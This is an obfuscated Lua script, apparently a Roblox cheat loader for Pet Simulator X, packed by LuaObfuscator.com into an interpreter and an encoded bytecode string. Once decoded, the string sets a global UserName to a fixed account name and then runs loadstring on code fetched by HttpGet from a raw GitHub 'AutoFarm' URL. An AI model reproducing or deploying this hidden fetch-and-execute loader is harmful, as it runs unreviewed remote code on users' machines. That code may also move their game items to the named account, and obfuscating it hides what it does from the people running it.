--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v96=0;local v97;while true do if (v96==1) then return v97;end if (v96==0) then v97=v5(v84,v19);v19=nil;v96=1;end end else return v84;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v85=(v31/((5 -3)^(v32-1)))%(((1 + 4) -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + (941 -(282 + 595)))))) ;return v85-(v85%((2569 -(1523 + 114)) -(857 + 74))) ;else local v86=(570 -(367 + 201))^(v32-1) ;return (((v31%(v86 + v86))>=v86) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==(4 -3)) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + ((1 + 0) -0) ;v34=1066 -(68 + 997) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;return (v37 * (472 -216)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + ((9 -5) -1) );v18=v18 + (354 -(87 + 263)) ;return (v41 * (16777396 -(67 + 113))) + (v40 * 65536) + (v39 * (188 + 68)) + v38 ;end local function v24()local v42=0 + (430 -(44 + 386)) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(11 -8)) then if (v47==(952 -((2288 -(998 + 488)) + 150))) then if (v46==((0 + 0) -0)) then return v48 * (0 -0) ;else local v98=0 + 0 ;while true do if (v98==(997 -(915 + 82))) then v47=1;v45=0;break;end end end elseif (v47==(5796 -3749)) then return ((v46==(0 + 0)) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(2210 -(1069 + 118)) ) * (v45 + (v46/((4 -(774 -(201 + 571)))^52))) ;end if (v42==(3 -1)) then v47=v20(v44,(1142 -(116 + 1022)) + 17 ,54 -23 );v48=((v20(v44,32)==((4 -3) + 0)) and  -1) or (792 -(368 + 423)) ;v42=3;end if (v42==(3 -2)) then v45=19 -(10 + 8) ;v46=(v20(v44,3 -2 ,462 -(416 + 26) ) * (2^(102 -70))) + v43 ;v42=1 + 0 + 1 ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=439 -(145 + 293) ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v67=3 -2 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=731 -(476 + 255) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==4) then while true do if (v53==3) then v60=nil;while true do local v99=0 -0 ;local v100;local v101;while true do if (v99~=(0 + 0)) then else v100=0 -0 ;v101=nil;v99=1385 -(746 + 638) ;end if (v99~=(1 + 0)) then else while true do if (v100~=(0 -0)) then else v101=0;while true do if (v101==(342 -(218 + 123))) then if (v54==(1581 -(1535 + 46))) then local v165=336 -(144 + 192) ;local v166;local v167;while true do if ((217 -(42 + 174))~=v165) then else while true do if (v166==(0 + 0)) then v167=0 + 0 ;while true do if (v167==(561 -(306 + 254))) then local v173=0 + 0 ;local v174;while true do if (v173~=0) then else v174=0 + 0 ;while true do if (v174~=(1504 -(363 + 1141))) then else local v180=1580 -(1183 + 397) ;while true do if (v180==(1 -0)) then v174=1468 -(899 + 568) ;break;end if (v180~=0) then else v57={};v58={v55,v56,nil,v57};v180=604 -(268 + 335) ;end end end if (v174==(291 -(60 + 230))) then v167=2;break;end end break;end end end if (v167==0) then local v175=572 -(426 + 146) ;while true do if (v175==(0 + 0)) then local v176=1933 -(565 + 1368) ;while true do if ((1457 -(282 + 1174))==v176) then v175=812 -(569 + 242) ;break;end if (v176==(0 -0)) then v55={};v56={};v176=2 -1 ;end end end if (v175==(1 + 0)) then v167=1;break;end end end if (v167~=(1026 -(706 + 318))) then else v54=1;break;end end break;end end break;end if (v165==(0 + 0)) then v166=1251 -(721 + 530) ;v167=nil;v165=1;end end end break;end if (v101==(1271 -(945 + 326))) then local v163=0 -0 ;local v164;while true do if (v163~=0) then else v164=0 + 0 ;while true do if (v164==1) then v101=701 -(271 + 429) ;break;end if (v164==(0 + 0)) then if (v54~=(1 + 0)) then else local v168=1500 -(1408 + 92) ;local v169;while true do if (0==v168) then v169=476 -(41 + 435) ;while true do if (v169==(1001 -(938 + 63))) then v59=v23();v60={};v169=1087 -(461 + 625) ;end if (v169~=(1127 -(936 + 189))) then else v54=2;break;end if (v169==(1289 -(993 + 295))) then local v177=1613 -(1565 + 48) ;local v178;while true do if (v177==(0 + 0)) then v178=1171 -(418 + 753) ;while true do if (v178==(1 + 0)) then v169=2;break;end if ((0 + 0)==v178) then for v183=1 + 0 ,v59 do local v184=0;local v185;local v186;local v187;local v188;while true do if (v184~=(1 + 0)) then else v187=nil;v188=nil;v184=531 -(406 + 123) ;end if (v184==(1771 -(1749 + 20))) then while true do if (v185~=0) then else local v195=0 + 0 ;while true do if ((0 -0)==v195) then v186=0 -0 ;v187=nil;v195=1093 -(975 + 117) ;end if (v195~=(1876 -(157 + 1718))) then else v185=1323 -(1249 + 73) ;break;end end end if ((1 + 0)~=v185) then else v188=nil;while true do if (v186==(1145 -(466 + 679))) then v187=v21();v188=nil;v186=2 -1 ;end if (1~=v186) then else if (v187==(3 -2)) then v188=v21()~=0 ;elseif (v187==2) then v188=v24();elseif (v187==(8 -5)) then v188=v25();end v60[v183]=v188;break;end end break;end end break;end if (v184~=(0 -0)) then else v185=1900 -(106 + 1794) ;v186=nil;v184=2 -1 ;end end end v58[1 + 2 ]=v21();v178=1 + 0 ;end end break;end end end end break;end end end if (v54==(5 -3)) then local v170=0;local v171;local v172;while true do if ((2 -1)==v170) then while true do if (0~=v171) then else v172=1227 -(322 + 905) ;while true do local v179=0;while true do if (v179==(0 -0)) then if ((114 -(4 + 110))==v172) then local v182=0;while true do if (v182==(1190 -(449 + 740))) then v172=1;break;end if (v182~=(584 -(57 + 527))) then else for v189=873 -(826 + 46) ,v23() do local v190=0;local v191;local v192;while true do if (v190~=1) then else while true do if (v191==(1427 -(41 + 1386))) then v192=v21();if (v20(v192,104 -(17 + 86) ,1 + 0 )==(0 -0)) then local v198=0 -0 ;local v199;local v200;local v201;local v202;while true do if (v198==(2 -1)) then local v203=1898 -(260 + 1638) ;while true do if ((166 -(122 + 44))==v203) then v201=nil;v202=nil;v203=3 -2 ;end if (1==v203) then v198=2;break;end end end if (v198~=(0 -0)) then else v199=0 -0 ;v200=nil;v198=1 + 0 ;end if (v198~=(1 + 1)) then else while true do if (v199==1) then v202={v22(),v22(),nil,nil};if (v200==(1257 -(1043 + 214))) then local v206=0 -0 ;local v207;local v208;while true do if (v206~=(1212 -(323 + 889))) then else v207=0;v208=nil;v206=2 -1 ;end if (v206==(581 -(361 + 219))) then while true do if ((320 -(53 + 267))~=v207) then else v208=0 + 0 ;while true do if (v208==0) then v202[416 -(15 + 398) ]=v22();v202[218 -(22 + 192) ]=v22();break;end end break;end end break;end end elseif (v200==1) then v202[686 -(483 + 200) ]=v23();elseif (v200==(984 -(18 + 964))) then v202[3]=v23() -(2^(43 -27)) ;elseif (v200~=(3 -0)) then else local v217=0 -0 ;local v218;local v219;while true do if (v217==(1 + 0)) then while true do if (v218==(0 + 0)) then v219=850 -(20 + 830) ;while true do if (v219~=(0 -0)) then else v202[3 + 0 ]=v23() -((128 -(116 + 10))^16) ;v202[1 + 3 ]=v22();break;end end break;end end break;end if (v217~=(0 + 0)) then else v218=0 -0 ;v219=nil;v217=739 -(542 + 196) ;end end end v199=2;end if (v199==(0 -0)) then local v204=0 + 0 ;while true do if (v204==(0 + 0)) then v200=v20(v192,5 -3 ,3);v201=v20(v192,4,4 + 2 );v204=1 + 0 ;end if (v204~=(1 + 0)) then else v199=1 + 0 ;break;end end end if (v199==(166 -(92 + 71))) then if (v20(v201,7 -4 ,3)==1) then v202[4]=v60[v202[4]];end v55[v189]=v202;break;end if (2~=v199) then else if (v20(v201,1 + 0 ,1)==(1 -0)) then v202[4 -2 ]=v60[v202[767 -(574 + 191) ]];end if (v20(v201,2,2 + 0 )==(1552 -(1126 + 425))) then v202[408 -(118 + 287) ]=v60[v202[2 + 1 ]];end v199=3;end end break;end end end break;end end break;end if (v190==0) then local v196=0;while true do if ((3 -2)==v196) then v190=850 -(254 + 595) ;break;end if ((1121 -(118 + 1003))~=v196) then else v191=0 -0 ;v192=nil;v196=378 -(142 + 235) ;end end end end end for v193=1 -0 ,v23() do v56[v193-1 ]=v28();end v182=4 -3 ;end end end if (v172~=1) then else return v58;end break;end end end break;end end break;end if (v170~=(1790 -(573 + 1217))) then else v171=0 -0 ;v172=nil;v170=1;end end end v164=1;end end break;end end end end break;end end break;end end end break;end if (v53==(0 + 0)) then local v94=977 -(553 + 424) ;while true do if (v94==(0 -0)) then local v112=0 + 0 ;while true do if (v112==(0 + 0)) then v54=0;v55=nil;v112=1 + 0 ;end if (v112~=(940 -(714 + 225))) then else v94=1;break;end end end if (v94==(1 + 0)) then v53=1 + 0 ;break;end end end if (v53==1) then v56=nil;v57=nil;v53=4 -2 ;end if (v53==(5 -3)) then local v95=0 -0 ;while true do if (v95==(1 + 0)) then v53=14 -11 ;break;end if (v95~=(0 + 0)) then else v58=nil;v59=nil;v95=754 -(239 + 514) ;end end end end break;end if (v52==(0 + 0)) then v53=0;v54=nil;v52=807 -(118 + 688) ;end if (v52==(1331 -(797 + 532))) then v57=nil;v58=nil;v52=3 + 0 ;end if (v52==(2 + 1)) then v59=nil;v60=nil;v52=1 + 3 ;end if (v52==(2 -1)) then v55=nil;v56=nil;v52=1204 -(373 + 829) ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v87=0,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + 1 ];else v79[v87]=v76[v87 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=5) then if (v82<=2) then if (v82<=0) then local v102=0;local v103;local v104;local v105;local v106;local v107;while true do if (v102==3) then v81=v69[v73];v107=v81[2];v106=v79[v81[3]];v79[v107 + 1 ]=v106;v102=4;end if (v102==4) then v79[v107]=v106[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v102=5;end if (v102==5) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v102=6;end if (v102==9) then v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v73=v81[3];break;end if (v102==7) then v103=0;for v158=v107,v74 do v103=v103 + 1 ;v79[v158]=v104[v103];end v73=v73 + 1 ;v81=v69[v73];v102=8;end if (v102==6) then v81=v69[v73];v107=v81[2];v104,v105=v72(v79[v107](v13(v79,v107 + 1 ,v81[3])));v74=(v105 + v107) -1 ;v102=7;end if (v102==0) then v103=nil;v104,v105=nil;v106=nil;v107=nil;v102=1;end if (v102==8) then v107=v81[2];v79[v107]=v79[v107](v13(v79,v107 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v102=9;end if (v102==1) then v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v102=2;end if (v102==2) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v102=3;end end elseif (v82>1) then do return;end else local v113=v81[2];local v114,v115=v72(v79[v113](v13(v79,v113 + 1 ,v81[3])));v74=(v115 + v113) -1 ;local v116=0;for v156=v113,v74 do local v157=0;while true do if (v157==0) then v116=v116 + 1 ;v79[v156]=v114[v116];break;end end end end elseif (v82<=3) then v79[v81[2]]=v81[3];elseif (v82>4) then v79[v81[2]]();else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=8) then if (v82<=6) then v79[v81[2]]=v63[v81[3]];elseif (v82>7) then local v118=v81[2];local v119=v79[v81[3]];v79[v118 + 1 ]=v119;v79[v118]=v119[v81[4]];else local v123=v81[2];v79[v123]=v79[v123](v13(v79,v123 + 1 ,v74));end elseif (v82<=9) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82==10) then v73=v81[3];else v79[v81[2]][v81[3]]=v81[4];end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!083O00028O0003023O005F4703083O00557365724E616D65030B3O004269676D61736B6F743732030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F7258536372697074732F6D61696E2F4175746F4661726D2E6C756100103O0012033O00013O0026093O00010001000100040A3O00010001001206000100023O00302O00010003000400122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O000F000100040A3O000100012O00023O00017O00",v9(),...);
